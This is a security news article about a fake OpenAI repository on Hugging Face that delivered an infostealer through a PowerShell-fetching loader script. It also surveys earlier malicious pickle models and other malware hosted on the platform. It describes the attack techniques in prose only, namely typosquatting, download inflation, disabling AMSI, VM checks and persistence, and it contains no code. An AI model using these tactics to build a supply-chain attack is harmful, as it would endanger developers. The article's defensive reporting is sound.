Hugging Face Pushed Infostealer Via Fake OpenAI Repository

The rapid rise of open-source repositories of artificial intelligence has transformed platforms like Hugging Face into critical infrastructure for developers, researchers, and enterprises. Millions of users rely on these repositories to download models, datasets, and applications that accelerate AI experimentation and deployment.

However, the same openness that fuels innovation has also created fertile ground for threat actors. Recent incidents demonstrate that attackers increasingly view AI repositories as software supply chain targets that can distribute malware at scale.

Hugging Face Pushed Infostealer Via Fake OpenAI Repository

In May 2026, researchers uncovered a malicious repository on Hugging Face impersonating an official OpenAI project. This incident reinforced a recurring security pattern: attackers exploit trust in established AI brands and open-source ecosystems to compromise developers and data scientists. Hugging Face has repeatedly encountered malicious models, poisoned repositories, and malware delivery infrastructure.

The fake repository, titled "Open-OSS/privacy-filter," masqueraded as OpenAI's legitimate Privacy Filter release. According to researchers from HiddenLayer, reported by BleepingComputer, the repository copied the legitimate model card almost verbatim and used typosquatting techniques to appear authentic. The malicious project rapidly climbed Hugging Face's trending charts and reportedly accumulated more than 244,000 downloads before it was removed.

The campaign demonstrated how attackers increasingly manipulate platform popularity systems to amplify malicious content. HiddenLayer researchers noted that the repository's download figures likely reflected artificial inflation designed to push the project into Hugging Face's trending section. Once users encountered the repository among popular AI tools, many assumed legitimacy based solely on visibility and branding.

The malicious repository specifically targeted Windows users through a Python file named "loader.py." Researchers discovered that the script retrieved and executed a PowerShell command that downloaded additional payloads from remote infrastructure. The malware chain ultimately deployed an infostealer capable of harvesting credentials and sensitive information from infected systems.

The attack reflected a shift from traditional malware distribution to the exploitation of trust in machine learning repositories. Developers who download what appears to be legitimate models risk executing code that establishes persistence and exfiltrates data.
Researchers observed the malware using evasive tactics.

Reports suggested the payload tried to disable the Windows Antimalware Scan Interface and evade sandbox analysis. It also checked for virtual environments before proceeding, showing the campaign aimed to bypass automated security tools.

The incident quickly generated discussion across the AI security community. Users on Reddit warned developers not to download the repository, highlighting how the malicious code leveraged PowerShell and scheduled tasks to maintain persistence. Community members also emphasized the dangers of executing unfamiliar model-loading scripts without inspection.

This incident highlights a core issue: machine learning repositories often blur the line between data and executable code. Unlike traditional repositories with clear separation, AI repositories package models with scripts and pipelines that can execute code during loading.

This architecture creates a dangerous environment. Executing third-party code to load models is routine, allowing threat actors to embed malicious functionality in workflows that otherwise appear standard.

The AI ecosystem has faced several warnings. In February 2024, researchers found at least 100 malicious Hugging Face models capable of executing code on victim machines and installing persistent backdoors. Attackers uploaded weaponized models capable of compromising systems during deserialization and execution.

The investigation highlighted the dangers of Python pickle serialization, which many machine learning frameworks rely on for model storage. Pickle-based formats can execute arbitrary Python code during deserialization, making them attractive for attackers seeking covert execution mechanisms. Researchers warned that users often treat model files as inert data even though loading them can trigger code execution.

Hugging Face's Previous Security Mishaps

JFrog researchers further analyzed malicious Hugging Face models and found silent backdoors aimed at data scientists. They found attackers hid malicious pickle payloads in uploaded models. Once loaded, these silently ran commands and left no clear compromise indicators.

Frog researchers warned that many organizations lack visibility into machine learning supply chain risks, as focus has traditionally been on software dependencies. Direct downloads from public repositories without verification, scanning, or testing create an attractive attack surface for adversaries.

Threat actors increasingly use AI hosting platforms as a distribution infrastructure for malware. In early 2026, researchers identified Android malware campaigns that leveraged Hugging Face repositories, including one where attackers distributed a fake antivirus named 'TrustBastion.'

The Android malware operation demonstrated how AI platforms can become hosting and delivery mechanisms even when the malicious content itself is not an AI model. Researchers noted that attackers rapidly reuploaded infrastructure after takedowns, illustrating the persistence and adaptability of these campaigns.

Other incidents revealed how attackers weaponized Hugging Face Spaces and model repositories to host malicious tooling and malware payloads. Reports in 2026 described campaigns involving the deployment of NKAbuse malware through Hugging Face-hosted resources, further reinforcing concerns that AI ecosystems increasingly resemble traditional software supply chain battlegrounds.

Academic researchers have also studied risks in machine learning ecosystems. Analyses of Hugging Face repositories found widespread use of unsafe serialization, which is vulnerable to object-injection attacks. Researchers showed malicious models can exploit deserialization behavior to compromise systems and bypass platform scanning.

Additional research warned that AI supply chains create complex dependency relationships involving models, datasets, frameworks, and external repositories. Security vulnerabilities or licensing conflicts in a single component can cascade across downstream environments. As organizations increasingly operationalize AI, these supply chain dependencies become increasingly difficult to audit and secure.

Hugging Face has improved repository security through malware scanning, suspicious-file detection, and rapid takedowns. But platform scale presents moderation challenges. The service hosts millions of repositories, many of which contain executable scripts and complex dependency chains that resist automated analysis.

The fake OpenAI repository incident exemplifies the severe trust and verification challenges that open AI ecosystems now face. Attackers exploit developers' reliance on convenience over rigorous security, impersonate trusted organizations, manipulate rankings, and embed malware in projects. This creates an urgent, widespread risk for all users of AI repositories.

Organizations leveraging public AI repositories must treat machine learning artifacts as potential attack vectors, not passive data. Security teams need to integrate repository reputation analysis, sandboxed model testing, dependency validation, and strict monitoring of model-loading activity to counter this emerging threat. Without stronger safeguards, attackers will continue to exploit vulnerabilities in the open AI ecosystem for malware distribution.

The Hugging Face incidents also demonstrate that AI security is no longer confined to model hallucinations, prompt injection, or data privacy concerns. The ecosystem now faces conventional cybersecurity threats adapted for AI infrastructure. As machine learning repositories become embedded in enterprise development pipelines, attackers will likely continue targeting them as valuable entry points into the software supply chain.

Share:

facebook
X (Twitter)
linkedin
copy link
Karolis Liucveikis

Karolis Liucveikis

Experienced software engineer, passionate about behavioral analysis of malicious apps

Author and general operator of PCrisk's News and Removal Guides section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over 8 years working in this branch. He attended Kaunas University of Technology and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications.

▼ Show Discussion

PCrisk security portal is brought by a company RCS LT.

Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

Donate